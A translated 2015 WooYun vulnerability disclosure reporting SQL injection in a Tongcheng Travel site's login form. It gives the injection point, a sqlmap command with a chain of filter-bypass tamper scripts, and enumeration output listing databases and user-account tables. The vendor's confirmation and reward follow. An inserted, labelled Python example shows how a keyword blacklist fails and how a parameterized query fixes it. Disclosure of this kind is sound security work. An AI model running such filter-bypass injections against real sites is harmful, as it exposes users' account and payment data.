
Vulnerability Summary

Defect ID: wooyun-2015-098572

Title: SQL injection in a travel site owned by Tongcheng Travel endangers the site's data (WAF bypass)

Vendor: Suzhou Tongcheng Travel Network Technology Co., Ltd.

Author: BMa

Submitted: 2015-02-27 18:31

Fixed: 2015-04-13 18:32

Published: 2015-04-13 18:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-02-27: Details sent to the vendor, awaiting vendor action
2015-02-27: Vendor confirmed; details visible to the vendor only
2015-03-09: Details disclosed to core white hats and relevant domain experts
2015-03-19: Details disclosed to regular white hats
2015-03-29: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public

Brief description:

A Tongcheng Travel site lets the entire set of databases be dumped.
I hear your Rank payouts are quite generous.

Detailed description:

Injection point:

http://www.tycts.com:80/website/websitelayout8/login/index (POST)
name=1&password=e


Parameter: name
Input filtering is in place, so tamper scripts were used:
www.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db
Screenshot:
current database: 'TCLine'

[Screenshot 1.jpg]


current user: '17uLXSLine'

[Screenshot 2.jpg]


available databases [10]:
[*] 17u_net
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCLineBase
[*] TCLineResource
[*] TCShare
[*] tempdb


[Screenshot 3.jpg]

[Screenshot 4.jpg]

[Screenshot 5.jpg]


The entire set of databases can be dumped. I originally wanted to use count to gauge the size, but there are too many tables, so here is a partial enumeration as proof:

[14:48:48] [INFO] fetching database names
[14:48:50] [INFO] the SQL query used returns 11 entries
[14:48:52] [INFO] retrieved: 17u_net
[14:48:54] [INFO] retrieved: TCB2cBlog
[14:48:56] [INFO] retrieved: TCB2cWenDa
[14:48:58] [INFO] retrieved: TCLineBase
[14:49:01] [INFO] retrieved: TCLineBase
[14:49:03] [INFO] retrieved: TCLineResource
[14:49:05] [INFO] retrieved: TCShare
[14:49:07] [INFO] retrieved: master
[14:49:09] [INFO] retrieved: model
[14:49:12] [INFO] retrieved: msdb
[14:49:14] [INFO] retrieved: tempdb
[14:49:14] [INFO] fetching tables for databases: 17u_net, TCB2cBlog, TCB2cWenDa,
TCLineBase, TCLineResource, TCShare, master, model, msdb, tempdb
[14:49:22] [INFO] the SQL query used returns 5 entries
[14:49:24] [INFO] retrieved: dbo.Line_TCPF_GroupArea
[14:49:26] [INFO] retrieved: dbo.MSreplication_objects
[14:49:29] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:34] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:49:37] [INFO] retrieved: dbo.MSsubscription_agents
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:45] [INFO] the SQL query used returns 9 entries
[14:49:47] [INFO] retrieved: dbo.MSreplication_objects
[14:49:50] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:55] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:49:56] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:00] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:02] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:04] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:06] [INFO] retrieved: dbo.b2c_cn_blog_article
[14:50:09] [INFO] retrieved: dbo.b2c_cn_blog_userControl
[14:50:11] [INFO] the SQL query used returns 17 entries
[14:50:14] [INFO] retrieved: dbo.DataDictionary
[14:50:16] [INFO] retrieved: dbo.KeywordsSource
[14:50:18] [INFO] retrieved: dbo.LineKeywords
[14:50:20] [INFO] retrieved: dbo.Line_CustomFunction
[14:50:23] [INFO] retrieved: dbo.Line_Member_CustomFunction
[14:50:26] [INFO] retrieved: dbo.MSreplication_objects
[14:50:28] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:50:30] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:50:32] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:34] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:36] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:38] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:41] [INFO] retrieved: dbo.MemberUnionPayAccount
[14:50:43] [INFO] retrieved: dbo.Sys_Parameter
[14:50:45] [INFO] retrieved: dbo.ZFXApply
[14:50:48] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:51] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:53] [INFO] the SQL query used returns 20 entries
[14:50:55] [INFO] retrieved: dbo.backupfile
[14:50:57] [INFO] retrieved: dbo.backupmediafamily
[14:50:59] [INFO] retrieved: dbo.backupmediaset
[14:51:01] [INFO] retrieved: dbo.backupset
[14:51:04] [INFO] retrieved: dbo.logmarkhistory
[14:51:07] [INFO] retrieved: dbo.restorefilegroup
[14:51:09] [INFO] retrieved: dbo.restorefilegroup
[14:51:13] [INFO] retrieved: dbo.restorehistory
[14:51:15] [INFO] retrieved: dbo.suspect_pages
[14:51:18] [INFO] retrieved: dbo.syspolicy_conditions
[14:51:20] [INFO] retrieved: dbo.syspolicy_configuration
[14:51:22] [INFO] retrieved: dbo.syspolicy_object_sets
[14:51:24] [INFO] retrieved: dbo.syspolicy_policies
[14:51:26] [INFO] retrieved: dbo.syspolicy_policy_categories
[14:51:29] [INFO] retrieved: dbo.syspolicy_policy_category_subscriptions
[14:51:32] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:34] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:36] [INFO] retrieved: dbo.syspolicy_system_health_state
[14:51:40] [INFO] retrieved: dbo.syspolicy_target_set_levels
[14:51:43] [INFO] retrieved: dbo.syspolicy_target_sets
[14:51:45] [INFO] the SQL query used returns 5 entries
[14:51:47] [INFO] retrieved: dbo.b2c_cn_answer
[14:51:52] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:54] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:56] [INFO] retrieved: dbo.b2c_cn_question_class
[14:51:58] [INFO] retrieved: dbo.dtproperties
[14:52:01] [INFO] the SQL query used returns 359 entries
[14:52:04] [INFO] retrieved: INFORMATION_SCHEMA.CHECK_CONSTRAINTS
[14:52:07] [INFO] retrieved: INFORMATION_SCHEMA.COLUMNS
[14:52:10] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
[14:52:13] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_PRIVILEGES
[14:52:17] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
[14:52:21] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
[14:52:26] [INFO] retrieved: INFORMATION_SCHEMA.DOMAINS
[14:52:30] [INFO] retrieved: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
[14:52:34] [INFO] retrieved: INFORMATION_SCHEMA.KEY_COLUMN_USAGE
[14:52:39] [INFO] retrieved: INFORMATION_SCHEMA.PARAMETERS
[14:52:44] [INFO] retrieved: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
[14:52:50] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINES
[14:52:55] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINE_COLUMNS
[14:53:01] [INFO] retrieved: INFORMATION_SCHEMA.SCHEMATA
[14:53:07] [INFO] retrieved: INFORMATION_SCHEMA.TABLES
[14:53:13] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_CONSTRAINTS
[14:53:22] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_PRIVILEGES
[14:53:28] [INFO] retrieved: INFORMATION_SCHEMA.VIEWS
[14:53:37] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
[14:53:44] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_TABLE_USAGE
[14:53:51] [INFO] retrieved: dbo.spt_fallback_db
[14:53:59] [INFO] retrieved: dbo.spt_fallback_dev
[14:54:07] [INFO] retrieved: dbo.spt_fallback_usg
[14:54:15] [INFO] retrieved: dbo.spt_monitor
[14:54:23] [WARNING] user aborted during enumeration. sqlmap will display partial output
[14:54:25] [INFO] the SQL query used returns 17 entries
[14:54:27] [INFO] retrieved: dbo.B2C_user
[14:54:29] [INFO] retrieved: dbo.MSreplication_objects
[14:54:32] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:54:34] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:54:37] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:54:41] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:54:43] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:54:45] [INFO] retrieved: dbo.MSsubscription_agents
[14:54:47] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:49] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:51] [INFO] retrieved: dbo.UserDeliverAddress
[14:54:54] [INFO] retrieved: dbo.b2cUserLoginLog
[14:54:56] [INFO] retrieved: dbo.b2c_cn_scenery_place
[14:54:58] [INFO] retrieved: dbo.globalControl
[14:55:01] [INFO] retrieved: dbo.guojiadiqudata
[14:55:05] [INFO] retrieved: dbo.weathercomcncity
[14:55:08] [INFO] retrieved: dbo.weathercomcncity
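As an added illustration of why the homegrown filter described in this report fails (not code from the report, the vendor or sqlmap): a login lookup guarded only by a keyword blacklist beside the same lookup with bound parameters. sqlite3 stands in for the site's MSSQL server, and the table, the blacklist pattern and the inputs are all constructed for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the login table; sqlite3 replaces MSSQL so
    the example runs offline (assumption, not the site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


# Hypothetical keyword blacklist of the kind the vendor describes ("not a WAF,
# anti-injection code we wrote ourselves"). It only recognises keywords that
# are surrounded by whitespace, which is exactly what sqlmap's space2comment
# and charencode tampers are designed to avoid.
BLACKLIST = re.compile(r"\s(or|and|union|select)\s|--", re.IGNORECASE)


def login_blacklist(conn, name, password):
    """Vulnerable: string concatenation protected only by the blacklist."""
    if BLACKLIST.search(name) or BLACKLIST.search(password):
        return False  # filter rejected the request
    sql = f"SELECT 1 FROM users WHERE name='{name}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, name, password):
    """Hardened: the driver binds the values, so input never becomes SQL
    and no keyword filter is needed."""
    sql = "SELECT 1 FROM users WHERE name=? AND password=?"
    return conn.execute(sql, (name, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: a plain-space payload the filter catches, and the
    # same payload with spaces replaced by comments, which it does not.
    spaced = "admin' OR '1'='1"
    commented = "admin'/**/OR/**/'1'='1"
    print("blacklist, spaced payload   :", login_blacklist(db, spaced, "x"))
    print("blacklist, commented payload:", login_blacklist(db, commented, "x"))
    print("parameterized, same payload :", login_parameterized(db, commented, "x"))
```

The blacklist version authenticates the comment-obfuscated input without a valid password, while the parameterized version treats the same bytes as a literal user name and rejects it; this is the fix the empty "Remediation" section leaves unstated.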

Proof of vulnerability:

Remediation:

Copyright notice: please credit BMa@WooYun when republishing


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed at: 2015-02-27 18:34

Vendor reply:

Thanks for looking at Tongcheng Travel. Brother, looking at that long chain of tamper scripts, the bypass was hard work; we will arrange to send a 300 JD.com gift card shortly as a token of thanks.

Latest status:

2015-02-27: Also, this isn't a WAF, it's anti-injection code they wrote themselves. Embarrassing.

2015-02-27: P.S. This is the six-in-one travel agency system under Tongcheng; you should have filed it as a generic vulnerability, you lost out.


Vulnerability rating:

Comments

  1. 2015-02-27 18:58 | Mik3y_14 ( Regular white hat | Rank:181 Vulnerabilities:29 | May you gather many; this is what stirs longing most. )

    The vendor is quite funny.

  2. 2015-02-27 18:58 | BMa ( Regular white hat | Rank:1776 Vulnerabilities:200 )

    @Suzhou Tongcheng Travel Network Technology Co., Ltd. I still haven't figured out the relationship between you two. Also, my original title wasn't like this.

  3. 2015-02-27 19:18 | 疯狗 Certified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under the sun, the heart is naturally free of code. )

    @BMa I changed it after confirming with the vendor, because of the domain name, you know :)

  4. 2015-02-27 19:26 | f4ckbaidu ( Regular white hat | Rank:182 Vulnerabilities:23 | Developers really got screwed )

    Hardware WAF: damn, anything gets called a WAF these days, like software such as xx Dog and anti-injection code.

  5. 2015-02-28 11:00 | BMa ( Regular white hat | Rank:1776 Vulnerabilities:200 )

    @Suzhou Tongcheng Travel Network Technology Co., Ltd. There was another injection point too; I slept on it and when I woke up you had patched it - - ! Yesterday made too much noise.

  6. 2015-03-03 19:22 | Suzhou Tongcheng Travel Network Technology Co., Ltd. (WooYun vendor)

    @BMa It was switched over to a software WAF, ha.

  7. 2015-03-03 19:25 | Suzhou Tongcheng Travel Network Technology Co., Ltd. (WooYun vendor)

    @BMa If you can bypass it this time, that's a real WAF bypass: 500 for the bypass, sent together with the earlier 300. But next time please don't talk about dumping the database; it puts a lot of pressure on the developers.

  8. 2015-03-03 20:23 | BMa ( Regular white hat | Rank:1776 Vulnerabilities:200 )

    @Suzhou Tongcheng Travel Network Technology Co., Ltd. I thought it was patched, so I stopped; I'll take another look when I have time.

  9. 2015-03-19 18:00 | BMa ( Regular white hat | Rank:1776 Vulnerabilities:200 )

    @Suzhou Tongcheng Travel Network Technology Co., Ltd. The JD.com card has arrived; thanks to the vendor for understanding white hats.